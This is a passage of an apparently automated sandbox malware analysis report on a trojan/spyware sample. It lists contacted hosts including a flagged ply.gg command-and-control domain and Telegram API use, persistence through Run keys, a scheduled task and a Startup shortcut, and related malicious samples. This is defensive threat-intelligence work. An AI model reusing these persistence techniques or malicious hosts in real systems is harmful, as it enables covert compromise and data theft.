                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 0000001F.00000003.2560713768.0000024CFDDA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.31.drfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegrPadawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://crl.micft.cMicRosofpowershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://aka.ms/pscore68powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.microsoft.$powershell.exe, 0000000E.00000002.1819411525.0000013FE7783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://api.telegram.orgadawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000031A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameadawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.vpowershell.exe, 00000016.00000002.2385958068.000001286FCB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          208.95.112.1
                                                                                          ip-api.comUnited States
                                                                                          53334TUT-ASUSfalse
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          147.185.221.22
                                                                                          carolina-comes.gl.at.ply.ggUnited States
                                                                                          12087SALSGIVERUStrue
                                                                                          IP
                                                                                          127.0.0.1
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1570394
                                                                                          Start date and time:2024-12-06 22:44:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 33s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:32
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:ozgpPwVAu1.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@37/37@3/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 20%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 94
                                                                                          • Number of non-executed functions: 15
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target Systen User, PID 4872 because it is empty
                                                                                          • Execution Graph export aborted for target ozgpPwVAu1.exe, PID 7644 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2188 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8024 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • VT rate limit hit for: ozgpPwVAu1.exe
                                                                                          TimeTypeDescription
                                                                                          16:45:03API Interceptor102x Sleep call for process: powershell.exe modified
                                                                                          16:45:49API Interceptor236258x Sleep call for process: wasdwasfwasfs.exe modified
                                                                                          16:46:48API Interceptor77x Sleep call for process: adawsfaefasfasfg.exe modified
                                                                                          16:46:59API Interceptor1x Sleep call for process: OpenWith.exe modified
                                                                                          16:47:00API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                          21:46:48Task SchedulerRun new task: Systen User path: C:\Users\user\AppData\Roaming\Systen s>User
                                                                                          21:46:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Systen User C:\Users\user\AppData\Roaming\Systen User
                                                                                          21:46:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Systen User C:\Users\user\AppData\Roaming\Systen User
                                                                                          21:47:08AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          208.95.112.1PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                                                          • ip-api.com/json/
                                                                                          5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                          • ip-api.com/json/
                                                                                          e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                          • ip-api.com/json/
                                                                                          Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                          • ip-api.com/json/?fields=225545
                                                                                          149.154.167.220vUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                            TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                  e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                            file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              ip-api.comPG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 208.95.112.1
                                                                                                              5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                              • 208.95.112.1
                                                                                                              s-part-0035.t-0009.t-msedge.nethttps://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 13.107.246.63
                                                                                                              https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.comGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                                                              • 13.107.246.63
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 13.107.246.63
                                                                                                              BGM LAW GROUP - RFP 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 13.107.246.63
                                                                                                              https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 13.107.246.63
                                                                                                              https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.107.246.63
                                                                                                              api.telegram.orgvUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUvUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Yn13dTQdcW.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              TUT-ASUSPG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 208.95.112.1
                                                                                                              5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                              • 208.95.112.1
                                                                                                              SALSGIVERUSPG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 147.185.221.24
                                                                                                              a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                              • 147.185.221.24
                                                                                                              grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 147.185.221.24
                                                                                                              jSm8N1jXbk.exeGet hashmaliciousS400 RATBrowse
                                                                                                              • 147.185.221.23
                                                                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 147.184.149.5
                                                                                                              i686.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 147.168.36.17
                                                                                                              fUXttuyA0n.exeGet hashmaliciousSheetRatBrowse
                                                                                                              • 147.185.221.19
                                                                                                              SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 147.185.221.24
                                                                                                              msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              • 147.185.221.24
                                                                                                              x9XhRITucw.exeGet hashmaliciousXWormBrowse
                                                                                                              • 147.185.221.20
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              BGM LAW GROUP - RFP 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Shipping Documents 72908672134.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://app.droplet.io/form/K47rYNGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTE_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTE_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              vUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              lg1wwLsmCX.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.4920646791623028
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaO:cJhXC9lHmutpJyiRDeJ/aUKrDgnmw
